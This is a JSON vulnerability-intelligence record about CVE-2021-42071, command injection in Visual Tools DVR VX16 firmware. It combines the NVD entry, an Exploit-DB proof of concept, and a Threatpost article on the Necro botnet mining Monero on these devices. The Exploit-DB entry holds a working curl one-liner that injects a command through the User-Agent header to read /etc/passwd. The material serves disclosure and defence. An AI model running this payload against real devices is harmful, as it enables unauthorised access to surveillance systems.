{"cve": [{"lastseen": "2022-03-23T19:26:54", "description": "In Visual Tools DVR VX16 4.2.28.0, an unauthenticated attacker can achieve remote command execution via shell metacharacters in the cgi-bin/slogin/login.py User-Agent HTTP header.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T17:15:00", "type": "cve", "title": "CVE-2021-42071", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42071"], "modified": "2021-10-15T16:11:00", "cpe": ["cpe:/o:visual-tools:dvr_vx16_firmware:4.2.28.0"], "id": "CVE-2021-42071", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-42071", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:visual-tools:dvr_vx16_firmware:4.2.28.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-05-13T17:36:47", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": 
"NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-06T00:00:00", "type": "exploitdb", "title": "Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-42071", "CVE-2021-42071"], "modified": "2021-07-06T00:00:00", "id": "EDB-ID:50098", "href": "https://www.exploit-db.com/exploits/50098", "sourceData": "# Exploit Title: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)\r\n# Date: 2021-07-05\r\n# Exploit Author: Andrea D'Ubaldo\r\n# Vendor Homepage: https://visual-tools.com/\r\n# Version: Visual Tools VX16 v4.2.28.0\r\n# Tested on: VX16 Embedded Linux 2.6.35.4.\r\n# CVE: CVE-2021-42071\r\n# Reference: https://www.swascan.com/security-advisory-visual-tools-dvr-cve-2021-42071/\r\n\r\n# An unauthenticated remote attacker can inject arbitrary commands to CGI script that can result in remote command execution.\r\n\r\ncurl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http:/DVR_ADDR/cgi-bin/slogin/login.py", "sourceHref": "https://www.exploit-db.com/download/50098", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-10-13T20:25:45", "description": "Threat group FreakOut\u2019s Necro botnet has developed a new trick: infecting Visual Tools DVRs with a Monero miner. 
\n\nJuniper Threat Labs researchers have issued a report detailing [new activities from FreakOut](<https://blogs.juniper.net/en-us/threat-research/necro-python-botnet-goes-after-vulnerable-visualtools-dvr>), also known as Necro Python and Python.IRCBot. In late September, the team noticed that the botnets started to target Visual Tools DVR VX16 4.2.28.0 models with cryptomining attacks. The devices are typically deployed as part of a professional-quality surveillance system. \n\nA [command injection vulnerability](<https://packetstormsecurity.com/files/163395/Visual-Tools-DVR-VX16-4.2.28.0-Command-Injection.html>) was found in the same devices last July. Visual Tools has not yet responded to Threatpost\u2019s request for comment. \n\n\u201cThe script can run in both Windows and Linux environments,\u201d the Juniper report said. \u201cThe script has its own polymorphic engine to morph itself every execution which can bypass signature-based defenses. This works by reading every string in its code and encrypting it using a hardcoded key.\u201d\n\nFreakOut has been [on the scene since](<https://threatpost.com/linux-attack-freakout-malware/163137/>) at least January, exploiting recently identified and unpatched vulnerabilities to launch distributed denial-of-service (DDoS) and [cryptomining attacks](<https://threatpost.com/bogus-cryptomining-apps-google-play/168785/>). Juniper reports that the threat actors have developed several iterations of the Necro bot, making steady improvements in its performance and persistence over the past several months. \n\n\u201cWe have noted a few changes on this bot from the previous version,\u201d the report said. \u201cFirst, it removed the SMB scanner which was observed in the May 2021 attack. 
Second, it changed the url that it injects to script files on the compromised system.\u201d\n\n## **New DGA Functionality Helps Evade Detection **\n\nThe team explained that more recent versions of the Necro bot scrapped its previous reliance on a hardcoded URL for a domain generation algorithm (DGA) for added persistence. \n\nThe new exploit has not yet been fully [evaluated for a CVE](<https://nvd.nist.gov/vuln/detail/CVE-2021-42071>), according to NIST, but [a proof of concept](<https://www.exploit-db.com/exploits/50098>) is available through the Exploit Database. \n\nFirst the Necro bot scans for the target port: [22, 80, 443, 8081, 8081, 7001]. If detected, it will launch a [XMRig](<https://support.alertlogic.com/hc/en-us/articles/360001389791-XMRig-Monero-Miner#:~:text=XMRig%20is%20a%20high%20performance,\\(both%20x86%20and%20x86_64\\).&text=Execution%20of%20the%20miner%20will,power%20to%20mine%20Monero%20coins.>) \u2013 that\u2019s a high-performance Monero (XMR) miner \u2013 linked to this wallet: \n\n[45iHeQwQaunWXryL9YZ2egJxKvWBtWQUE4PKitu1VwYNUqkhHt6nyCTQb2dbvDRqDPXveNq94DG9uTndKcWLYNoG2uonhgH]\n\nThe team added that the bot is also still actively trying to exploit these previously identified vulnerabilities: \n\n * CVE-2020-15568 \u2013 TerraMaster TOS before 4.1.29\n * CVE-2021-2900 \u2013 Genexis PLATINUM 4410 2.1 P4410-V2-1.28\n * CVE-2020-25494 \u2013 Xinuos (formerly SCO) Openserver v5 and v6\n * CVE-2020-28188 \u2013 TerraMaster TOS <= 4.2.06\n * CVE-2019-12725 \u2013 Zeroshell 3.9.0\n\nMounir Hahad, head of Juniper Threat Labs, told Threatpost that security teams need security that\u2019s equipped to handle DGA domain attempts. 
\n\n\u201cThe very existence of this kind of botnet highlights the need for a connected security approach where DNS security capabilities on the network identify connection attempts to DGA domains behind public dynamic DNS services, as well as routers, switches, and firewalls that are capable of immediately isolating the compromised host from the rest of the network,\u201d Hahad said. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-10-13T20:17:09", "type": "threatpost", "title": "FreakOut Botnet Turns DVRs Into Monero Cryptominers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12725", "CVE-2020-15568", "CVE-2020-25494", "CVE-2020-28188", "CVE-2021-2900", "CVE-2021-42071"], "modified": "2021-10-13T20:17:09", "id": "THREATPOST:BD49A82E71837666D05253C126F19EBE", "href": "https://threatpost.com/freakout-botnet-dvrs-monero-cryptominers/175467/", "cvss": {"score": 
10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}